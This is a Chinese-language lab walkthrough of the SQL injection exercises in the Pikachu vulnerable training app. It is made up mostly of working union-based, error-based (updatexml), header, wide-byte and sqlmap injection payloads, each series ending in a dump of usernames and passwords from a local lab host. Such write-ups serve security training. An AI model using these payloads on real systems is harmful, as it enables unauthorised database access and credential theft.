*Pikachu*
*数字型注入(POST)*
BP抓包开始
Order by 2#
2个字段
id=1 union select 1,2 #&submit=%E6%9F%A5%E8%AF%A2
id=1 union select 1,database() #&submit=%E6%9F%A5%E8%AF%A2
id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘pikachu’ #&submit=%E6%9F%A5%E8%AF%A2
id=1 union select 1,group_concat(column_name) from information_schema.columns where table_schema=‘pikachu’ and table_name=‘users’ #&submit=%E6%9F%A5%E8%AF%A2
id=1 union select 1,group_concat(username,‘*’,password) from users #&submit=%E6%9F%A5%E8%AF%A2
获得账号密码
admin/123456
*字符型注入(GET)*
1’报错,字符型
?name=1’+order+by+2–+
?name=1’+order+by+3–+ 报错
两个字段
name=1’+union+select+1,2–+
name=1’+union+select+1,database()–+
name=1’+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema=‘pikachu’–+
name=1’+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_schema=‘pikachu’+and+table_name=‘users’–+&submit=%E6%9F%A5%E8%AF%A2
name=1’+union+select+1,group_concat(username,password)+from+users–+&submit=%E6%9F%A5%E8%AF%A2
得到账号密码
*搜索型注入*
BP抓包
因为是搜索型注入根据语法‘%like%’
闭合为%’
尝试1%’
报错,增加注释
显示正常
1%'+order+by+3–+
1%'+order+by+4–+
其余与字符型一致
name=1%'+union+select+1,2,3–+&submit=%E6%90%9C%E7%B4%A2
name=1%'+union+select+1,2,database()–+&submit=%E6%90%9C%E7%B4%A2
name=1%'+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema=‘pikachu’–+&submit=%E6%90%9C%E7%B4%A2
name=1%'+union+select+1,2,group_concat(column_name)+from+information_schema.columns+where+table_schema=‘pikachu’+and+table_name=‘users’–+&submit=%E6%90%9C%E7%B4%A2
name=1%'+union+select+1,2,group_concat(username,password)+from+users–+&submit=%E6%90%9C%E7%B4%A2
获得账号密码
*XX型注入*
BP抓包尝试输入1’
发现报错中带有)
尝试输入1’)
加注释
发现闭合
name=1’)+order+by+2–+
name=1’)+union+select+1,2–+
name=1’)+union+select+1,database()–+
name=1’)+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema=‘pikachu’–+
name=1’)+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_schema=‘pikachu’+and+table_name=‘users’–+
name=1’)+union+select+1,group_concat(username,‘*’,password)+from+users–+
获得账号密码
*Insert/update注入*
抓包注册
输入1’后查看报错发现闭合应该是’
尝试注册利用报错注入
username=1’+or+updatexml(1,concat(0x7e,database(),0x7e),1)+or’&password=1&sex=1&phonenum=1&email=1&add=1&submit=submit
之后与之前相似
username=1’+or+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=‘pikachu’),0x7e),1)+or’&password=1&sex=1&phonenum=1&email=1&add=1&submit=submit
username=1’+or+updatexml(1,concat(0x7e,(select+group_concat(column_name)+from+information_schema.columns+where+table_schema=‘pikachu’+and+table_name=‘users’),0x7e),1)+or’&password=1&sex=1&phonenum=1&email=1&add=1&submit=submit
username=1’+or+updatexml(1,concat(0x7e,(select+group_concat(username,‘*’,password)+from+users),0x7e),1)+or’&password=1&sex=1&phonenum=1&email=1&add=1&submit=submit
获得账号密码
*Delete注入*
BP抓包尝试报错注入
id=59+or+updatexml(1,concat(0x7e,database(),0x7e),1)–+
id=59+or+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=‘pikachu’),0x7e),1)–+
id=59+or+updatexml(1,concat(0x7e,(select+group_concat(column_name)+from+information_schema.columns+where+table_schema=‘pikachu’+and+table_name=‘users’),0x7e),1)–+
id=59+or+updatexml(1,concat(0x7e,(select+group_concat(username,‘*’,password)+from+users),0x7e),1)–+
获取到账号密码
*http header注入*
通过admin和123456登录
BP抓包
存在如下页面
查看
尝试在user-agent注入
报错注入
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0’or updatexml(1,concat(0x7e,database(),0x7e),1) or’
之后类似
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0’or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘pikachu’),0x7e),1) or’
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0’or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘pikachu’ and table_name=‘users’),0x7e),1) or’
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0’or updatexml(1,concat(0x7e,(select group_concat(username,‘*’,password) from users),0x7e),1) or’
获取到账号密码
*布尔盲注*
使用sqlmap注入
sqlmap -u “http://192.168.100.129/pikachu/vul/sqli/sqli_blind_b.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --batch --dbs
继续
sqlmap -u “http://192.168.100.129/pikachu/vul/sqli/sqli_blind_b.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --batch -D pikachu --tables
sqlmap -u “http://192.168.100.129/pikachu/vul/sqli/sqli_blind_b.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --batch -D pikachu -T users --columns
sqlmap -u “http://192.168.100.129/pikachu/vul/sqli/sqli_blind_b.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --batch -D pikachu -T users -C username,password --dump
获得账号密码
*时间盲注*
使用sqlmap
sqlmap “http://192.168.100.129/pikachu/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --batch --dbs
sqlmap -u “http://192.168.100.129/pikachu/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --batch -D pikachu --tables
sqlmap -u “http://192.168.100.129/pikachu/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --batch -D pikachu -T users --columns
sqlmap -u “http://192.168.100.129/pikachu/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --batch -D pikachu -T users -C username,password --dump
获得账号密码
*宽字节注入*
尝试在’前加%df
name=1%df’or 1=1–+
name=1%df’order by 2–+
name=1%df’order by 3–+
name=1%df’union select 1,2–+
name=1%df’union select 1,database()–+
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
